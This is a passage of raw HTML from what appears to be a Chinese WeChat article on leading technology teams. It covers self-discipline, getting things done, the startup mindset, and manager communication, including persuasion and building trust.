0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">4.3 自律自由</span></strong></span><br/></h2><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.形象自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)别油腻</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.言语自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)别吹</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)不要轻易打扰别人的生活</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.品行自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)登台时看的是能力，是机遇</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)最后看人品</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.感情自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)穷不能失志，富不可嫌妻</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)不忘糟糠，不花天酒地</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.关系自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)朋友也就那么几个</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)与其耗费精力参加酒局，不如腾出时间陪陪家人和老友</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">6.金钱自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)存钱</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">7.情绪自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)难免会遇到不顺心的事，会遇到看不顺眼的人</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)控制住自己的情绪</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">c)不与烂人争辩，不与烂事纠缠。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">8.心态自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)中年心事浓如酒，满腹辛酸无处说。</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)上有老下有小的年纪，挤压磕碰无处不在，生活危机时时都有。</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">c)在充满焦虑的日子里，一定要学会哄自己开心。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">9.灵魂自律</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)到了一定年龄后，忙于生计，就没有时间去提升自己。</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)可日子是流水，生活不是。</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">c)无论多么忙碌，都要抽出一些时间去阅读。</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">d)看一篇文，听一段书，丰富内心的灵魂，才能邂逅更好的世界。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="624" data-backw="578" data-galleryid="" data-ratio="1.0794701986754967" data-s="300,640" data-type="png" data-w="1812" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=89afd353&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhoWa781cuVTtPzXNm8OxO9O4EHXU7hR1VQVd9ianTflMIa0Y8yoftx3w%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;font-style: italic;">PS: 我从不相信什么懒洋洋的自由，我向往的自由是通过勤奋和努力实现更广阔的人生，那样的自由才是珍贵的、有价值的。我相信一万小时定律，我从来不相信天上掉馅饼的灵感和坐等的成就。做一个自由又自律的人，靠势必实现的决心认真地活着。</span><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">4.4 做事成事</span></strong><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">打造高效技术团队的另一个核心要素，做事。而要做好事，首先我们要和业务的心在一起，团队必须要有一个共同的目标、可迭代的协作流程，以及统一的评价机制。其次，要打造技术团队的产品力，而这就要从从内因和外因两方面做分析，但其中真正能产生正向改变的是内因，想清楚自己想要的，剩下的就是寻找突破的方法或手段。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">在创业期和团队组建初期，我们往往只需要专业能力较强的人，先“把事情做对”。随着业务的发展，企业的壮大，再慢慢通过管理能力来让每个人“做对的事情”。随着我们事业的继续扩展，企业向集团化发展，就需要有更强能力的人来把握未来，“为未来事”。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">个人侧 也有一套成事方法论，可参考《冯唐成事心法》，网上有个</span><span style="font-family: 宋体;font-size: 17px;">脑图</span><span style="font-size: 17px;font-family: 宋体;">。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="349" data-backw="578" data-galleryid="" data-ratio="0.6047700170357752" data-s="300,640" data-type="png" data-w="1174" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=cc02bc39&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFh7wKudZgIibuncUKgQaqOLSuwNwVC9fTkkzdZYUibK2nmdIDsNSBYibn2Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"></span><br/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">4.5 范式创业</span></strong></span><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">一个优秀的团队领导，跟一个优秀的创业者异曲同工。都需要思考本质、思考意义，正能量，你的思维就是团队的天花板。一旦心存侥幸，团队也会整体拉跨。把一个团队经营好，你也是一个小CEO，不用拘泥形式。都是自己的事。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">1. 创业者要去思考自己存在的意义</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   当你想走出创业这一步的时候，一定要想清楚能支撑你去创业的核心原因是什么。这其实会上升到一些哲学的层面，就是你要先想明白自己存在的意义，活着的意义。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   不仅是创业，几乎所有的领域中真正有成就、有杰出贡献的人都会思考这个问题。甚至于我们今天看到的社会的发展、人类的进步，都是来自于思考这些问题的人，是由他们带动的。然而在现实中，大多数的人可能一辈子都没有真正有效地去思考过这个问题，但如果你选择创业，就不能再忽视或逃避这个问题。当你问自己这个问题的时候，你会发现你的整个视野立马宽广了很多，不再局限于很多细节的东西。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;"><span style="font-family: 宋体;" lang="EN-US">   </span><span style="font-family: 宋体;font-weight: bold;">清晰定位 -- 迷茫 -- 准绳</span></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">2. 创业者要时时更新自己的认知创业者还要多多提升自己的认知，方式就是不断接触更多的人和事，接触更多的信息，然后理解它们。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   因此，当你不断更新自己的认知，认识了这个世界的一些粗浅的本质后，再去看待周围的事物，去做一些决策的时候，就会发现自己能思考得更深一层，有更多的想法。而当你想明白之后，就不会再煎熬和痛苦，在面对创业中的各种事情也会更加从容，能够阻碍你的东西也会越来越少。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">3. 创业最大的收获是对思维的洗礼</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   并不是每个创业者都会成功，但不论最终结果如何，每一次创业都是对创业者思维方式的巨大洗礼。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   你一旦偷懒，不去想明白就去决策的时候，世界会立刻还你以颜色，你做出的决定很可能会导致特别糟糕的结果，比如会招致合作伙伴的不满，丢失用户，甚至会影响到业绩等等。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   创业前和创业后最本质的差别就是他们的思维方式，他们的思考会更精密，他们的逻辑性会越来越强。即使他们最后创业失败了，这样的思维方式也会成为他们最大的财富。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   最后，不管面对多大的困境，创业者一定要具备某些信念，其中最重要的一点就是要永远相信未来会更好，这样的信念会支撑你面对创业过程中的任何困难，支撑你走下去。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">5 沟通艺术</span></strong></span><br/></h1><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">沟通有难度的本质：</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.第一种是由于立场、利益、背景的原因</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.第二种思维方式、常识、知识储备的不一致造成的认知差异</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.第三种是由于沟通信息衰减造成的（漏洞效应）</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.第四种沟通障碍是沟通交流者的心态（不愿主动沟通、性格原因、自以为是）</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">5.1 日常沟通</span></strong></span><br/></h2><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.BIC模型，B事实、I影响、C后果。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.事实：管理者需要区分事实和观点，只讲事实不讲观点。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.影响：已发生的事实对周围人和事产生的作用</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.后果：在影响的基础上，强调长期持续会引发的负面影响。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">5.2 跨部门沟通</span></strong></span><br/></h2><p style="text-indent: 0pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">由于没有上下级关系的制约，同级沟通是比较难的。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">有一个观念，如果我们的上游出问题，不论他是没能力、没资源或是不愿意解决，问题就是在那，如果不帮他解决，我自己就得蒙受其害。这种情况下，那件事不再是别人的事，而是我们的事。当所有部门都理解了这个观念，都能协助上游解决问题，并给下游干净的水源，那跨部门沟通便不再是问题了。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">策略方法类：寻找共同的利益出发点。有时候看似没有利益关系，甚至利益还有冲突的不同团队，如果你仔细分析，是可以找到共同利益点的，包括远期的、近期的，以及直接的、间接的利益。另外，做为一个技术管理者，要有舍小利顾大局的格局，更多的时候可以换位思考，从对方的角度出发，看看哪些是有利于他们的，如此跨团队沟通会容易推进很多。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">当然还有其他的通用技巧，例如给予尊重、不攻击对方、积极主动…</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">5.3 向上沟通</span></strong></span><br/></h2><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.战略类、重点强调的问题 必定是核心问题，多推敲。指哪打哪，不是打哪指哪</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.汇报，务必提前做好准备，目标和举措都准备好方案，最好有Plan B</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.管理老板，定期沟通，老板就是来解决问题的，有没有问题，都要对齐，这么看，老板也是你的下属</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="431" data-backw="578" data-galleryid="" data-ratio="0.7460567823343849" data-s="300,640" data-type="png" data-w="1268" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=f44a4746&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhWvo91ibru6f1OGT9UXN1my0qSzdsypia2TTr5ZiaMqvSHBic0wx6bqiaXWQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;"></span><br/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">5.4 向下沟通</span></strong></span><br/></h2><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.充分信任自己的团队（谈心、收集诉求）</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.沟通中不要试图回避问题和矛盾，问题会积累成为大问题，最终让团队垮掉</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.重要的事情要沟通到位。（重要的事情说三遍，闭环重点问题）</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.在和下属沟通中，需要学会聆听，使用启发及引导的方式让团队成员说出真实的想法。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.组织专项沟通会。（通用类问题，举一反三的问题）</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">5.5 一对一沟通</span></strong><br/></h2><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.有些问题是一对一过程才能识别的，团队聚餐并解决不了个人问题。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.一对一交流过程，还会获取额外信息。（见微知著）。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.提前构思每个人的关注点以及问题答案帮助其个人提升。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.倾听对方的需求、分享你的需求（目标对齐）。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">5.6 说服力</span></strong></span><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;color: rgb(255, 76, 0);">如何让自己更有说服力？</span></p><p><strong>1. 基础认知</strong></p><p>    那些被影响、被说服的人往往并不会觉得自己的意志被绑架，</p><p>    反而觉得对方在想自己所想、急自己所急，</p><p>    最终成为这些人的忠实拥护者和追随者。</p><p><strong>2. 不要纠结于表面原因</strong></p><p>    想法背后的真实动机</p><p>    注意倾听对方的真正需求</p><p>    全新的态度和方式去倾听</p><p>    从对方的反馈去判断他想要什么</p><p>    洞察人性</p><p><strong>3. 不要被对方的需求牵着鼻子走</strong></p><p>    很多人的动机和幻想本身还处在一种混沌迷乱的状态</p><p>    需求有可能是欲望</p><p>    你完全满足对方的后果就是对方永不满足</p><p>    升职加薪解决不了所有</p><p>        价值、成长</p><p>        认可</p><p><strong>4. 用故事或场景说服对方</strong></p><p>    直接说是不会打动对方的</p><p>    将戒烟跟对方梦想中的生活结合起来</p><p>    在对方的脑海中描绘出生动的故事或场景</p><p><strong>5. 不要预先提出解决方案</strong></p><p>    当你想说服别人的时候，不要直接给对方一个命令或解决方案，这样根本不会奏效，反而会让他产生逆反心理。</p><p>    你要做的是，提供上下文，然后让对方主动做出决定。</p><p><strong>6. 站在对方的立场模拟思考</strong></p><p>    共情</p><p>    你必须先弄清楚自己动机。然后，离开自己的位置，站到对方的立场上，和他们一起与你的那些观点、动机辩论。</p><p>    是真的想帮对方解决问题，会更容易获取信任和说服对方。</p><p>    而不是你想要的，这是最关键的。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="435" data-backw="578" data-galleryid="" data-ratio="0.7531545741324921" data-s="300,640" data-type="png" data-w="2536" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c910c3c6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhpMr0y95n0ob2DK1hZeU5Kznou7JkJIcT2sftvfxPbe5l7I0ibeZwV4Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;"><span style="font-family: 宋体;">当然无论是基础沟通还是团队管理，</span><span style="font-family: 宋体;font-weight: bold;">信任</span><span style="font-family: 宋体;">还是团队建设的基石。缺乏信任，即使方法策略得当，也是事倍功半。甚至还可能被恶意解读。</span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">5.7 信任建立</span></strong></span><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;font-weight: bold;">如何建立信任？</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.发自内心的相信改变观念能够带来结果的改变（Leader放下个人资历优势、放下成员不够努力的偏见）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.真诚的沟通（简单、真诚）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.尽量多的暴露工作以外的信息（家庭信息，被关心）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.每个人平等的发言机会和时间</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.示弱，减小盲区（知道自己不知道，承认并认可别人的长处给团队带来的价值）</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">6 知行合一</span></strong></span><br/></h1><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="262" data-backw="578" data-galleryid="" data-ratio="0.4541420118343195" data-s="300,640" data-type="png" data-w="1352" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=4d1d4f7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhuXs5EcjibuTA40JsU0F3x2Sz5O0BywgUhFibf37P8ricVQFicnMxlKNcvg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 